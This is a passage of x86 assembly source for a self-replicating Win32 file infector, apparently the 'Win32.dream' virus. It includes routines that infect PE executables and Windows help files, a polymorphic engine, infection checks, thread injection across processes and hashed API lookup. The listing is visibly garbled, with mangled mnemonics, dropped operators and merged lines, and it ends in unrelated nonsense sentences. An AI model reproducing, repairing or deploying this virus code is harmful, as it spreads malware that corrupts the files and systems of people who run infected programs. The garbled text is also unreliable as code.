CI_FINISH:
CMP [EBX Paramz (5-1) * 4], 1
JZ $ 8
Call [EBX APIZ 8 * 4]; UnmapViewoffile
Call [EBX APIZ 1 * 4]; CloseHandle
End_thread check_infected
Check_infected endp
DW infect_hlp-create_infected
CREATE_INFECTED PROC
Start_thread create_infected
Lea EDI, [ESI VBODY VSIZE 260]
Push EDI
Stosd
Call $ 241; Number of the Terms in A
SHR EAX, 29; Equation
XCHG EAX, ECX
Inc ECX
Push ECX
SUB ESP, 128
Fnsave [ESP]
Call $ 221; Generate a Multiplier ( /-)
Sub EDX, EDX
MOV EBX, 100000
Div EBX
OR EDX, EDX
JZ $ - 16
FLD1
RCR EAX, 1
JC $ 4
FCHS
Push Edx
FIMUL DWORD PTR [ESP]
FSTP TBYTE PTR [EDI]
POP EDX
Sub EDI, -TBYTE
Call $ 119; Generate An Exponent
Loop $ - 41; Next Term in the equation
Inc ECX
Inc ECX
Call $ 110; Two Points on The Curve
Loop $ - 5
Fnrstor [ESP]
SUB ESP, -128
POP EAX
Stosd
Lea ECX, [EDI TBYTE]
Sub EDI, [ESP]
XCHG Eax, EDI
POP EDI
Stosd
Pusha; Calculate An Angle, IT
MOV EBX, ESI; Means: Call Other Process
MOV [ESI Paramz (4-1) * 4], ECX
MOV [ESI Paramz (5-1) * 4], 1
Lea EDI, [ESI ACTIVE 1] Lea ESI, [ESI Process 1 * 8]
Lodsd
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
POP ESI
Push 40 ESI
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ $ - 9
POPA
MOV [ESI Paramz (5-1) * 4], 0
END_THREAD CREATE_INFECTED
Call $ 66; Generate An Exponent
Sub EDX, EDX
Push 11
POP EBX
Div EBX
OR EDX, EDX
JZ $ -14
Push Edx
Fild DWORD PTR [ESP]
Call $ 15
DT 3FEB8637BD05AF6C69B6R
POP EAX EBX
FLD TBYTE PTR [EAX]
XCHG EBX, EAX
CDQ
Call $ 25
MOV EBX, 1000000
Div EBX
Push Edx
FIMUL DWORD PTR [ESP]
FSUB
FSTP TBYTE PTR [EDI]
POP EAX
Sub EDI, -TBYTE
RET
MOV Eax, 0; Get a Random Value
LpGettickCount Equ $ -4
Call EAX
Add Eax, 80h
PUSH ECX 33
POP ECX
Add Eax, EAX
JNC $ 4
XOR Al, 197
Loop $ - 6
MOV [EBP ($ - 16) -CREATE_INFECTED], EAX
POP ECX
RET
CREATE_INFECTED ENDP
DW infect_exe-infect_hlp
Infect_hlp proc
START_THREAD INFECT_HLP
SUB ESP, 16
SUB EBX, EBX
MOV Word PTR [ESI VBODY __ RETURN 11-VStart], 02EBH
Lea Eax, [ESI VBODY VSIZE]
PUSH EBX 80H 3 EBX EBX 0C0000000H EAX
Call [ESI APIZ 4 * 0]; Open File
INC EAX
JZ IH_FAILED
Dec EAX
Push EAX
MOV BH, 80H
Push EBX 40h
MOV EAX, 0
LPGLOBALLOC EQU $ -4
Call Eax; GlobalAlloc
MOV [ESP 4], EAX
XCHG Eax, ESI
Push 16
POP ECX
Sub EDX, EDX
Call read
JC IH_FREE
Lodsd
CMP EAX, 35F3FH; HLP Signature
JNZ IH_FREE
Lodsd
Lea Edx, [EAX 55]; Directory Offset
MOV ECX, 512
Lodsd
Lodsd
Call read
IH_SEARCH:
Dec ECX
JZ IH_FREE
CMP DWORD PTR [ESI ECX], 'Sys |'
JNZ IH_Search
CMP DWORD PTR [ESI ECX 4], 'Met'
JNZ IH_Search
MOV EAX, [ESI-4]
Xchg Eax, [ESI ECX 8] XCHG EAX, EDX
Push 21
SUB ESI, -512
POP ECX
Call read
Lodsd
Push 21
POP ECX
Sub Eax, ECX
Add Edx, ECX
MOV [ESP 4 4], EDX
MOV [ESP 8 4], EAX
Mov EDI, [ESP 4]
SUB EDI, -549
Lea ESI, [EBP HLP1_S-INFECT_HLP]
Lea Eax, [EDI SIZE-HLP1_S]
MOV [ESP 12 4], EAX
Push HLP1_E-HLP1_S
POP ECX
REP MOVSB
Push EDI
MOV EBX, [ESP 40 16 8 4]
Lea ESI, [EBX VBODY]
PUSH ESI
SUB ESI, -VSIZE
IH_NEXT:
SUB ESI, 4
MOV EAX, [ESI]
Call ihck
OR EDX, EDX
JNZ Ihex
Mov Al, 68h
Stosb
MOV EAX, [ESI]
Stosd
JMP IHDN
Ihex: MOV Al, 0B8H
Stosb
MOV EAX, [ESI]
XOR EAX, EDX
Stosd
MOV Al, 53
Stosb
MOV EAX, EDX
Stosd
MOV Al, 80
Stosb
IHDN: CMP [ESP], ESI
JNZ IH_NEXT
JMP IHCN
IHCK: CALL IHCV
JC IHA1
Sub EDX, EDX
RET
IHA1: MOV EBX, EAX
IHAX: MOV EAX, EBX
Call $ 9
DD 12345678H
POP EDX
SUB [EDX], 12345678H
Org $ -4
RND DD 87654321H
Mov Edx, [EDX]
XOR [EBP RND-INFECT_HLP], EDX
XOR EAX, EDX
Call IHCV
JC IHAX
XCHG EAX, EDX
Call IHCV
JC IHAX
XCHG EDX, EAX
RET
IHCV: Pusha
Push 4
POP ECX
ICVA: CMP AL, ''
JNA ICVF
CMP Al, 0F0H
JNBE ICVF
CMP Al, '""
JZ ICVF
CMP AL, "'"
JZ ICVF
CMP Al, "` "
JZ ICVF
CMP AL, "/"
JZ ICVF
Ror Eax, 8
Loop ICVA
Test Al, 0F9h
ICVF EQU $ -1
POPA
RET
IHCN: POP EAX EAX
MOV ECX, EDI
SUB ECX, EAX
Sub Eax, EAX
MOV [ESI ORG_EP-VSTART], EAX
Push ECX
SUB ECX, P1-HLP1_E HLP1_E-HLP2_E
MOV EAX, [ESP 12 4 4]
MOV [EAX], CX
SUB ESI, VSTART-HLP1_E
Push HLP2_SZ
POP ECX
REP MOVSB
POP EAX
MOV ESI, [ESP 4]; buffer
SUB ESI, -528
SUB EAX, HLP1_S-HLP2_E-21
MOV [ESI], EAX
Add [ESI 4], EAX
MOV ESI, EDI
MOV EDX, [ESP 4 4]
MOV ECX, [ESP 8 4]
Sub eax, ecxjna h_free
Call read
CMP [ESI 4], "` (rr "; already infected?
JZ IH_FREE
MOV EBX, [ESP 4]
Lea ECX, [EDI EAX]
SUB ECX, EBX
SUB ECX, 528
MOV EAX, [ESP 4]
SUB EAX, -528
Mov Edx, [EAX]
Sub EDX, ECX
SUB [EAX], EDX
Mov EDX, [EBX 12]
Lea ESI, [EBX 528]
Call write
MOV ESI, [ESP 4]
Push 16
Add [ESI 12], ECX
Sub EDX, EDX
POP ECX
Call write
MOV EDX, [ESI 4]
SUB EDX, -55
MOV ECX, 512
SUB ESI, -16
Call write
JMP IH_FREE
Spos: Pusha
Sub Eax, EAX
Push Eax Ex EDX DWORD PTR [ESP 4 * 5 8 * 4]
MOV EAX, 0
LpsetFilePointer EQU $ -4
Call EAX
POPA
RET
Read: Call SPOS
Pusha
Sub Eax, EAX
PUSH ECX EAX
Call $ 9
R_TS: DD?
PUSH ECX ESI DWORD PTR [ESP 4 * 6 8 * 4]
MOV EAX, 0
LpreadFile EQU $ -4
Call EAX
POP ECX
CMP DWORD PTR [EBP R_TS-INFECT_HLP], ECX
JNZ $ 3
Test Al, 0F9h
POPA
RET
Write: Call SPOS
Pusha
Sub Eax, EAX
Push EAX
Lea EBX, [EBP R_TS-INFECT_HLP]
Push EBX ES ESI DWORD PTR [ESP 4 * 5 8 * 4]
MOV EAX, [ESP 4 * 5 8 * 4 4 16 8 40]; OU! What does it mean :)?
Call [EAX APIZ 4 * 10]
POPA
RET
HLP1_S = $
DW 4
DW Offset Label1 - $ - 2
DB "RR (` USER32.DLL ', `Enumwindows',` su') ", 0
Label1 = $
DW 4
Size dw 0
P1 = $
DB "enumwindows (` "
HLP1_E = $ $
JMP ESP
DB "', 0)", 0
HLP2_E = $
HLP2_SZ = HLP2_E-HLP1_E
IH_FREE:
MOV ESI, [ESP 40 16 4 4]
Call [ESI APIZ 4 * 1]; CloseHandle
MOV EAX, 0
LPGLOBALFREE EQU $ -4
Call EAX
IH_FAILED:
SUB ESP, -12
END_THREAD INFECT_HLP
INFECT_HLP ENDP
DW POLY_ENGINE-INFECT_EXE
INFECT_EXE PROC
Start_thread infect_exe
SUB EBX, EBX
Lea Eax, [ESI VBODY VSIZE]
PUSH EBX 80H 3 EBX EBX 0C0000000H EAXCALL [ESI APIZ 4 * 0]; CreateFilea
INC EAX
JZ IE_Failed
Dec EAX
Push EAX EBX EAX
MOV EAX, 0
LpGetFileSize Equ $ -4
Call EAX
CMP Eax, 4096
JC IE_Close
CMP Eax, 104857600
JNBE IE_Close
MOV [EBP FSIZE-INFECT_EXE], EAX
Call $ 7
DB "1", 0
PUSH EBX EBX 2 EBX DWORD PTR [ESP 4 * 5]
Call [ESI APIZ 4 * 6]; CREATEFILEMAPPINGA
OR EAX, EAX
JZ IE_Close
PUSH EBX EBX EBX 4 EAX
Call [ESI APIZ 28]; MapViewoffile
OR EAX, EAX
JZ IE_MClose
Push EAX
CMP Word PTR [EAX], 'ZM'
JNZ IE_UNMAP
CMP Word PTR [EAX MZ_CRLC], BX
JZ IE_TESTED
CMP Word PTR [EAX MZ_LFARLC], 64
JC IE_UNMAP
IE_TESTED:
MOV EDI, [EAX MZ_LFANEW]
Add Edi, EAX
CMP DWORD PTR [EDI], 4550H
JNZ IE_UNMAP
MOV EAX, [ESP 4]
MOV [ESI Paramz (3-1) * 4], EAX
MOV EAX, [EBP FSIZE-INFECT_EXE]
MOV [ESI Paramz (4-1) * 4], EAX
Call Other_Process, 1; Active Check_infected Process
CMP [ESI Paramz (4-1) * 4], 1
JZ IE_UNMAP
Call Other_Process, 2; Active Create_infected Process
MOV AX, [EDI NT_FILEHEADER.FH_CHARACTERISTICS]]
Test AX, Image_File_Executable_Image
JZ IE_UNMAP
Test Ax, Image_File_DLL
JNZ IE_UNMAP
Movzx ECX, [EDI NT_FILEHEADER.FH_NUMBEROFSECTIONS]]
Dec ECX
OR ECX, ECX
JZ IE_UNMAP
Imul Eax, ECX, Image_SizeOf_SECTION_HEADER
Movzx EDX, [EDI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
MOV [EBP IE_SECTION-INFECT_EXE], EAX
Lea EBX, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Add Ebx, EAX
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
Push EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
Lea ECX, [ESI VBODY INF_EP-VSTART]
MOV [ECX], EAX
Mov Eax, [EDI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT]
MOV [ECX 5 6], EAX
Call Other_Process, 5; Active Poly_Engine ProcessPop EAX
Add Eax, [EBX SH_POINTERTORAWDATA]
Add Eax, [ESI Paramz 4 * 0]
Add Eax, DWORD PTR [ESI VBODY VSIZE 260]
MOV ECX, [EDI NT_OPTIONALHEADER.OH_FILALIGNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
MOV [EBP Align_D-Infect_exe], EAX
Call [ESI APIZ 4 * 8]; UnmapViewoffile
Call [ESI APIZ 4 * 1]; CloseHandle
SUB EBX, EBX
Call $ 7
DB "1", 0
Align_D EQU $ 1
Push 80h EBX 4 EBX DWORD PTR [ESP 4 * 5]
Call [ESI APIZ 4 * 6]; CREATEFILEMAPPINGA
PUSH EBX EBX EBX 2 EAX
Call [ESI APIZ 4 * 7]; THX2 Bumblebee for His His HELP
Push EAX
Add eax, [eax.mz_lfanew]
XCHG Eax, EDI
MOV EBX, 0
IE_SECTION EQU $ -4
Movzx EDX, [EDI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Lea Eax, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Movzx ECX, [EDI NT_FILEHEADER.FH_NUMBEROFSECTIONS]]
Add Eax, EBX
IE_Change_Flag:
OR [eax.sh_characteristics], image_scn_mem_write
Sub eax, image_sizeof_section_header
Loop ie_change_flag
Lea Eax, [EDX EDI NT_OPTIONALHEADER.OH_MAGIC]
Add Ebx, EAX
MOV EAX, [ESI VBODY INF_EP-VSTART]
MOV [EDI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT], EAX
Pusha
MOV ECX, [ESI Paramz 4 * 0]
MOV [ESP 7 * 4], ECX
Mov EDI, [EBX Sh_SIZEOFRAWDATA]
Add [ESP 7 * 4], EDI
Add Edi, [EBX SH_POINTERTORAWDATA]
Add Edi, [ESP 7 * 4 4]
Lea ESI, [ESI VBODY VSIZE 260 CI_SIZE]; POLY VBODY
REP MOVSB
POPA
Mov Eax, [ESI Paramz 4 * 0]
Add Eax, [EBX Sh_SIZEOFRAWDATA]
MOV ECX, [EDI NT_OPTIONALHEADER.OH_FILALIGNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
MOV [EBX Sh_SIZEOFRAWDATA], EAX
Push EAX
MOV EAX, [EBX Sh_VIRTUALSIZE]
Add Eax, VSIZE 68MOV ECX, [EDI NT_OPTIONALHEADER.OH_SECTIONALNMENT]
Add Eax, ECX
CDQ
Dec EAX
Div ECX
Mul ECX
POP ECX
CMP EAX, ECX
JNC IE_1
MOV EAX, ECX
IE_1: MOV [EBX SH_VIRTUALSIZE], EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
CMP Eax, [EDI NT_OPTIONALHEADER.OH_SIZEOFIMAGE]
JC IE_2
MOV [EDI NT_OPTIONALHEADER.OH_SIZEOFIMAGE], EAX
IE_2: or DWORD PTR [EBX Sh_CHARACTERISTICS], /
Image_scn_cnt_code or image_scn_mem_execute or /
Image_scn_mem_write
.IF DWORD PTR [EDI NT_OPTIONALHEADER.OH_CHECKSUM]! = 0
MOV EAX, 0
Fsize EQU $ -4
Add Eax, [ESI Paramz (1-1) * 4]
MOV [ESI Paramz (2-1) * 4], EAX
Call Other_Process, 6; Active Checksum Process
Mov Eax, [ESI Paramz (4-1) * 4]
MOV [EDI NT_OPTIONALHEADER.OH_CHECKSUM], EAX
.endif
PUSH ESI
MOV EDI, [EBP Align_D-Infect_exe]
Add Edi, [ESP 4]
Lea ESI, [ESI VBODY VSIZE 260]
Lodsd
Sub Eax, 4-TBYTE
Sub EDI, EAX
XCHG EAX, ECX
REP MOVSB
POP ESI
IE_UNMAP:
Call [ESI APIZ 4 * 8]; UnmapViewoffile
IE_MClose:
Call [ESI APIZ 4 * 1]; CloseHandle
IE_Close:
Call [ESI APIZ 4 * 1]; CloseHandle
IE_failed:
END_THREAD INFECT_EXE
Other_Process Proc
Pusha
MOV ECX, [ESP 36]
MOV EBX, ESI
Lea EDI, [ESI ACTIVE ECX]
Lea ESI, [ESI Process ECX * 8]
Lodsd
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
POP ESI
Push 40 ESI
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ $ - 9
POPA
Ret 4
Other_Process Endp
INFECT_EXE ENDP
DW CHECKSUM-POLY_ENGINE
POLY_ENGINE PROC
Start_thread poly_ENGINE
MOV EBX, ESI
Lea ESI, [EBX VBODY VSIZE]
Lea EDI, [ESI 260 CI_SIZE]
Push EBX EDI
SUB ECX, ECX
Mov Edx, vsize / 2mov Eax, 0e8h
Stosd
MOV Eax, 242C8300H
Stosd
MOV Al, 5
Stosb
@@ A: Call Random
Test Al, 1
JNZ @@ b
CMP EDX, 1
JZ @@ v
SUB ESI, 4
PUSH ESI
Lodsd
Call @@ 1_a
POP ESI
Dec edx
JMP @@k
@@ B: Test Al, 2
JNZ @@ c
@@ v: dec ESI
Dec ESI
PUSH ESI
Lodsw
Inc ECX
Call @@ 1_a
POP ESI
SUB CL, CL
JMP @@k
@@ C: Test Al, 4
JNZ @@ e
Call @@ 1; Push Random Value DWORD
JC $ 7
Call @@ 2
JMP @@ L
@@ E: incc Ecx; Push Random Value Word
Call @@ 1
JC $ 7
Call @@ 2
SUB CL, CL
JMP $ 5
@@ K: DEC EDX
JZ $ 4
@@ L: JMP @@ a
MOV AX, 0E4FFH
Stosw
JMP PE_FAILED
@@ 1: Call Random; Push Random Value
Test Al, 1
JNZ @@ 1_d
@@ 1_a: xchg Eax, EBX; Push Certain Value
@@ 1_b: Jecxz @@ 1_c; Push Word
MOV Al, 66H
Stosb
@@ 1_c: Call @@ 3_a
Test Al, 0F9h
@@ 1_d EQU $ -1
RET
@@ 2: Call Random; Pop Reg32 or Add ESP, 4
Test Al, 1
JNZ @@ 2_b
And Al, 7
CMP AL, 4
JZ @@ 2
OR Al, Al
JZ @@ 2
Jecxz @@ 2_a
XCHG EAX, EBX
MOV Al, 66H
Stosb
XCHG EBX, EAX
@@ 2_a: add al, 58h
Stosb
RET
@@ 2_b: MOV AX, 0C483H
Stosw
MOV Al, 4
JECXZ @@ 2_c
MOV Al, 2
@@ 2_c: stosb
RET
@@ 3: xchg Eax, EBX; Push Certain Value in Eax
@@ 3_a: MOV Al, 68h; in EBX
Stosb
XCHG EAX, EBX
JECXZ @@ 3_b
Stosw
RET
@@ 3_b: stosd
RET
Random:
MOV EAX, 0BFF71234H
PUSH ECX 33
POP ECX
@@ r: add eax, EAX
JNC $ 4
XOR Al, 197
Loop @@ r
MOV [EBP RANDOM 1-POLY_ENGINE], EAX
POP ECX
RET
PE_FAILED:
POP ECX EBX
Sub EDI, ECX
MOV [EBX PARAMZ 4 * 0], ediend_thread poly_ENGINE
POLY_ENGINE ENDP
DW K32_ADDRS-Checksum
Checksum Proc
Start_thread Checksum
XCHG EBX, ESI
Other_Process_Mem EBX 3; Get Mem from Other Process
MOV ECX, [EBX PARAMZ (2-1) * 4]
Sub EDX, EDX
SHR ECX, 1
@@ 1: lodsw
MOV EDI, 0FFFFH
And Eax, EDI
Add Edx, EAX
MOV EAX, EDX
And EDX, EDI
SHR EAX, 10h
Add Edx, EAX
Loop @@ 1
MOV EAX, EDX
SHR EAX, 10h
Add Ax, DX
Add Eax, [EBP 4]
MOV [EBX Paramz (4-1) * 4], EAX
Call [EBX APIZ 8 * 4]; UnmapViewoffile
Call [EBX APIZ 1 * 4]; CloseHandle
END_THREAD CHECKSUM
Checksum ENDP
K32_ADDRS EQU this BYTE
X EQU
DW x lpcreatefile
DW x lpclosehandle
DW x lpcreatemutexa
DW x LpGetLastError
DW x LPRELESEMUTEX
DW x LPEXITPROCESS
DW x lpcreatefilemappinga
DW x lpmapviewoffile
DW x lpunmapviewoffile
DW x lpgetsystemdirectory
DW x lpwritefile
DW x lpcreateprocessa
DW x lpopenprocess
DW x lpwaitforsingleObject
DW x lpregisterServiceProcess
DW x LpGetFileSize
DW x LPGLOBALLOC
DW x LPGLOBALFREE
DW x lpreadfile
DW x lpsetfilepointer
DW x lpserrormode
DW x LpGetCurrentProcessID
DW x lpgetversion
DW x LpGettickCount
DW x malloc 63
DW x malloc 51
DW x malloc 106
DW x infect_file-2
Count EQU ($ -k32_addrs) / 2
K32_CRCS EQU this Byte
DD 08C892DDFH; CREATEFILEA
DD 068624A9DH; CloseHandle
DD 020B943E7H; CreateMutexa
DD 087D52C94H; getLastError
DD 0C449CF4EH; ReleaseMutexa
DD 040F57181H; EXITPROCESS
DD 096B2D96CH; CREATEFILEMAPPINGA
DD 0797B49ECH; MapViewoffile
DD 094524B42H; UnmapViewOffile
DD 0593AE7CEH; GetSystemDirectorya
DD 021777793H; WRITEFILE
DD 0267E0B05H; CREATEPROCESSA
DD 033D350C4H; OpenProcess
DD 0D4540229H; WaitforsingleObject
DD 05F31BC8EH; RegisterServiceProcess
DD 0ef7d811bh; getFileSize
DD 083A353C3H; GLOBALLOC
DD 05CDF6B6AH; GlobalFree
DD 054D8615AH; ReadFile
DD 085859D42H; SetFilePointer
DD 0A2EB817BH; SETERRORMODE
DD 0EB1CE85CH; getCurrentProcessid
DD 042F13D06H; GetVersion
DD 0613FD7BAH; GettickCount
DD 041D64912H; OpenFilemappinga
DD 0797B49ECH; MapViewoffile (Other Addures)
DD 019F33607H; CreateThread
DD 00ac136bah; SLEEP
DD 0
Process_maps Equ this Byte
DW x infect_file
DW x Check_infected
DW x create_infected
DW x infect_hlp
DW x infect_exe
DW x poly_ENGINE
DW x Checksum
P_number EQU ($ -Process_maps) / 2
DW x malloc 95
Process_Memory Struc
Thandle DD 0; Returned Thread Handle By Dropper
TH_MEMPOS DD 0; Thread Body Memory Position
Process DD P_Number DUP (0, 0); HProcess (Wait), Processid (Open)
APIZ DD Count-2 DUP (0); All API Functionz without Two Last
Active DB P_NUMBER DUP (0); Active Process (= FUNCTION)?
Paramz DD 8 DUP (0); Process Parameters
Vbody db vsize dup (0); Virus Body (Poly, Valuez)
FileName DD 260 DUP (0); Name of File (Opening, ETC)
CI_SIZE EQU 2 * 16 * (TBYTE TBYTE); Check_infected FPU Buffer
CINFECTED DB CI_SIZE DUP (0)
Poly_vbody EQU this BYTE
; ** this is tasm32 bug, Cannot ASM THROUGH CONST-> Proc DUP
ENDS
ALIGN 4
FILE_END:
DB 68 DUP (0)
MEM_END:
Push 401000H
SUB ESP, VSIZE
JMP vStart
FGX: DB "E: /X_WIN/Abcd.exe", 0
FG0: MOV EDX, Offset FGX
Sub Eax, EAX
Push Eax 80h 3 EAX Eax 0C0000000H EDX
Call Createfilea
PUSH 0 0
Call fg1
DB "Win32.dream - Welcome to my world ...", 0
FG1: Call FG2
DB "first generation sample", 0
FG2: PUSH 0
Call Messageboxa
Call EXITPROCESS
Where is the thumb ou whisk? Where is Xiyomo? Where is Xomomo know 1,100? Where is Xiyo? End MEM_END
